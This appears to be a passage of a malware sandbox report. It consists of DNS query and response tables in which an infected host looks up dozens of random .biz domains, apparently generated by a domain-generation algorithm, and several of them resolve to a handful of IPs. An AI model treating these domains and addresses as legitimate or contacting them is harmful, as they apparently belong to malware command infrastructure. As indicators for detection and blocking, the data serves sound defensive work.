                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.890599966 CET192.168.2.81.1.1.10xfcc3Standard query (0)pgfsvwx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:43.939052105 CET192.168.2.81.1.1.10xa1a7Standard query (0)aatcwo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.324903965 CET192.168.2.81.1.1.10x2748Standard query (0)nlscndwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.363066912 CET192.168.2.81.1.1.10x8aeaStandard query (0)bzkysubds.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.476851940 CET192.168.2.81.1.1.10x324Standard query (0)kcyvxytog.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.043606997 CET192.168.2.81.1.1.10xd235Standard query (0)ltpqsnu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.984488010 CET192.168.2.81.1.1.10x2c72Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:37.432199955 CET192.168.2.81.1.1.10xf134Standard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:38.805805922 CET192.168.2.81.1.1.10x46daStandard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:39.813663960 CET192.168.2.81.1.1.10x7288Standard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:40.507563114 CET192.168.2.81.1.1.10x4c03Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:41.697293997 CET192.168.2.81.1.1.10xd654Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.153661013 CET192.168.2.81.1.1.10xebffStandard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.175275087 CET192.168.2.81.1.1.10xebffStandard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:44.013878107 CET192.168.2.81.1.1.10x8a43Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.215331078 CET192.168.2.81.1.1.10x9d1cStandard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.081593037 CET192.168.2.81.1.1.10xa9Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.762034893 CET192.168.2.81.1.1.10x45fStandard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.667279959 CET192.168.2.81.1.1.10x2acStandard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.698772907 CET192.168.2.81.1.1.10x4e16Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:48.529159069 CET192.168.2.81.1.1.10xd6d5Standard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.185100079 CET192.168.2.81.1.1.10x3361Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.351147890 CET192.168.2.81.1.1.10x3c7eStandard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.377450943 CET192.168.2.81.1.1.10x3c7eStandard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.290489912 CET192.168.2.81.1.1.10x701eStandard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.633656025 CET192.168.2.81.1.1.10x56b2Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.139195919 CET192.168.2.81.1.1.10xf80Standard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.890988111 CET192.168.2.81.1.1.10xe1e8Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.579372883 CET192.168.2.81.1.1.10x944bStandard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.262933969 CET192.168.2.81.1.1.10x2075Standard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.349551916 CET192.168.2.81.1.1.10x7e11Standard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.945874929 CET192.168.2.81.1.1.10x7469Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.716589928 CET192.168.2.81.1.1.10xddd8Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.404062986 CET192.168.2.81.1.1.10x1b81Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.412244081 CET192.168.2.81.1.1.10x5de5Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.208795071 CET192.168.2.81.1.1.10x4930Standard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.258645058 CET192.168.2.81.1.1.10x986eStandard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.934010029 CET192.168.2.81.1.1.10xff4dStandard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.955621004 CET192.168.2.81.1.1.10xff4dStandard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.936430931 CET192.168.2.81.1.1.10xc6a7Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.577095985 CET192.168.2.81.1.1.10x9ee3Standard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.733731031 CET192.168.2.81.1.1.10x8a50Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.047586918 CET192.168.2.81.1.1.10xbcc9Standard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.685167074 CET192.168.2.81.1.1.10xb900Standard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.909759998 CET192.168.2.81.1.1.10xa95bStandard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:01.360688925 CET192.168.2.81.1.1.10x824bStandard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.211487055 CET192.168.2.81.1.1.10x6daaStandard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.430663109 CET192.168.2.81.1.1.10xc284Standard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.088689089 CET192.168.2.81.1.1.10xb527Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.889435053 CET192.168.2.81.1.1.10x7c4aStandard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.946604967 CET192.168.2.81.1.1.10x67bcStandard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.747503042 CET192.168.2.81.1.1.10x83ceStandard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.844434977 CET192.168.2.81.1.1.10x4902Standard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:05.441349030 CET192.168.2.81.1.1.10x82b1Standard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:05.705645084 CET192.168.2.81.1.1.10x224cStandard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:06.280689001 CET192.168.2.81.1.1.10xdf4aStandard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:06.521934032 CET192.168.2.81.1.1.10x8df0Standard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:07.267570019 CET192.168.2.81.1.1.10x940fStandard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.043463945 CET192.168.2.81.1.1.10x1dadStandard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.878860950 CET1.1.1.1192.168.2.80x7a1fNo error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.938910007 CET1.1.1.1192.168.2.80x57ceNo error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.940131903 CET1.1.1.1192.168.2.80xf0d3No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.787480116 CET1.1.1.1192.168.2.80x2890No error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.546628952 CET1.1.1.1192.168.2.80xc696No error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.546628952 CET1.1.1.1192.168.2.80xc696No error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.651745081 CET1.1.1.1192.168.2.80x985fNo error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.528116941 CET1.1.1.1192.168.2.80x79baNo error (0)wllvnzb.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.163049936 CET1.1.1.1192.168.2.80x4fefNo error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.343043089 CET1.1.1.1192.168.2.80xac08No error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.517411947 CET1.1.1.1192.168.2.80x612No error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.174134016 CET1.1.1.1192.168.2.80x8e9aNo error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.269578934 CET1.1.1.1192.168.2.80xcb45No error (0)jhvzpcfg.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.982058048 CET1.1.1.1192.168.2.80x5a0dNo error (0)acwjcqqv.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.178637981 CET1.1.1.1192.168.2.80x469fNo error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:11.884512901 CET1.1.1.1192.168.2.80x3b96No error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.603766918 CET1.1.1.1192.168.2.80xbc64No error (0)vyome.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.763186932 CET1.1.1.1192.168.2.80xeca1No error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.745704889 CET1.1.1.1192.168.2.80x70cdNo error (0)yauexmxk.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.949990988 CET1.1.1.1192.168.2.80xd3b6No error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.527496099 CET1.1.1.1192.168.2.80x89c8No error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.215928078 CET1.1.1.1192.168.2.80x7ed6No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.770576954 CET1.1.1.1192.168.2.80xcf36No error (0)sxmiywsfv.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.846013069 CET1.1.1.1192.168.2.80x7ce2No error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.846013069 CET1.1.1.1192.168.2.80x7ce2No error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:18.035068035 CET1.1.1.1192.168.2.80x9b38No error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:18.320338964 CET1.1.1.1192.168.2.80xa0e9No error (0)vrrazpdh.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:19.186481953 CET1.1.1.1192.168.2.80xb50eNo error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:19.952234983 CET1.1.1.1192.168.2.80x5c18No error (0)ftxlah.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.454413891 CET1.1.1.1192.168.2.80x342eNo error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.411300898 CET1.1.1.1192.168.2.80xe11fNo error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.466083050 CET1.1.1.1192.168.2.80x3f21No error (0)typgfhb.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.363343954 CET1.1.1.1192.168.2.80x5872No error (0)wllvnzb.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:23.132112026 CET1.1.1.1192.168.2.80x5399No error (0)esuzf.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:23.999073029 CET1.1.1.1192.168.2.80x25b1No error (0)gvijgjwkh.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.079984903 CET1.1.1.1192.168.2.80x53d7No error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.699776888 CET1.1.1.1192.168.2.80xc6e3No error (0)qpnczch.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.923546076 CET1.1.1.1192.168.2.80x918dNo error (0)jhvzpcfg.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:25.588027954 CET1.1.1.1192.168.2.80xac57No error (0)brsua.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:25.736718893 CET1.1.1.1192.168.2.80x5432No error (0)acwjcqqv.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:26.596513987 CET1.1.1.1192.168.2.80x5473No error (0)dlynankz.biz85.214.228.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.411453009 CET1.1.1.1192.168.2.80xabe4No error (0)vyome.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.979592085 CET1.1.1.1192.168.2.80xa228No error (0)oflybfv.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.430248022 CET1.1.1.1192.168.2.80xf41dNo error (0)yauexmxk.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.237128973 CET1.1.1.1192.168.2.80x56fdNo error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.655685902 CET1.1.1.1192.168.2.80xa987No error (0)yhqqc.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.548228979 CET1.1.1.1192.168.2.80xeb97No error (0)mnjmhp.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.187403917 CET1.1.1.1192.168.2.80x1bd0No error (0)sxmiywsfv.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.609018087 CET1.1.1.1192.168.2.80x3d0No error (0)opowhhece.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.785809040 CET1.1.1.1192.168.2.80xf9d7No error (0)vrrazpdh.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.345720053 CET1.1.1.1192.168.2.80xae7fNo error (0)jdhhbs.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.228034973 CET1.1.1.1192.168.2.80xd106No error (0)ftxlah.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.830248117 CET1.1.1.1192.168.2.80x44No error (0)mgmsclkyu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.740942955 CET1.1.1.1192.168.2.80xfeadNo error (0)ocsvqjg.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:18.112207890 CET1.1.1.1192.168.2.80xe4faNo error (0)aatcwo.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.371090889 CET1.1.1.1192.168.2.80xf79bNo error (0)ywffr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.691520929 CET1.1.1.1192.168.2.80x2d53No error (0)kcyvxytog.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.394785881 CET1.1.1.1192.168.2.80x5c34No error (0)nwdnxrd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.426985025 CET1.1.1.1192.168.2.80xd7d6No error (0)ecxbwt.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.476361036 CET1.1.1.1192.168.2.80x490fNo error (0)ereplfx.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.494420052 CET1.1.1.1192.168.2.80x359cNo error (0)pectx.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.336982012 CET1.1.1.1192.168.2.80x33f0No error (0)ptrim.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.495480061 CET1.1.1.1192.168.2.80xc60aNo error (0)zyiexezl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.366878033 CET1.1.1.1192.168.2.80xb03cNo error (0)banwyw.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.794403076 CET1.1.1.1192.168.2.80x4a9cNo error (0)znwbniskf.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:24.291723967 CET1.1.1.1192.168.2.80x4d9No error (0)wxgzshna.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.283523083 CET1.1.1.1192.168.2.80x4199No error (0)cpclnad.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.970505953 CET1.1.1.1192.168.2.80x7f00No error (0)mjheo.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.128007889 CET1.1.1.1192.168.2.80x6ffdNo error (0)zrlssa.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.655203104 CET1.1.1.1192.168.2.80xd7cbNo error (0)wluwplyh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.981818914 CET1.1.1.1192.168.2.80xb5aaNo error (0)jlqltsjvh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.121867895 CET1.1.1.1192.168.2.80xc9f9No error (0)zgapiej.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.639738083 CET1.1.1.1192.168.2.80x3ec7No error (0)xyrgy.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.804352045 CET1.1.1.1192.168.2.80x4b1cNo error (0)jifai.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.519270897 CET1.1.1.1192.168.2.80x9b1bNo error (0)xnxvnn.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.607933044 CET1.1.1.1192.168.2.80x9020No error (0)htwqzczce.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.607933044 CET1.1.1.1192.168.2.80x9020No error (0)htwqzczce.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.098376036 CET1.1.1.1192.168.2.80x5fdNo error (0)ihcnogskt.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.232258081 CET1.1.1.1192.168.2.80x4a45No error (0)kvbjaur.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.952222109 CET1.1.1.1192.168.2.80x356bNo error (0)kkqypycm.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:32.249808073 CET1.1.1.1192.168.2.80xb6d8No error (0)uphca.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.075750113 CET1.1.1.1192.168.2.80x855fNo error (0)fjumtfnz.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.501965046 CET1.1.1.1192.168.2.80x2585No error (0)uevrpr.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.337529898 CET1.1.1.1192.168.2.80x2895No error (0)fgajqjyhr.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.401423931 CET1.1.1.1192.168.2.80x3b7cNo error (0)hlzfuyy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.392970085 CET1.1.1.1192.168.2.80x60a7No error (0)hagujcj.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.532113075 CET1.1.1.1192.168.2.80xe98aNo error (0)rffxu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.089349985 CET1.1.1.1192.168.2.80xee65No error (0)sctmku.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.740919113 CET1.1.1.1192.168.2.80xb4c8No error (0)cikivjto.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.958873034 CET1.1.1.1192.168.2.80xf4dbNo error (0)qcrsp.biz34.211.97.45A (IP address)IN (0x0001)false
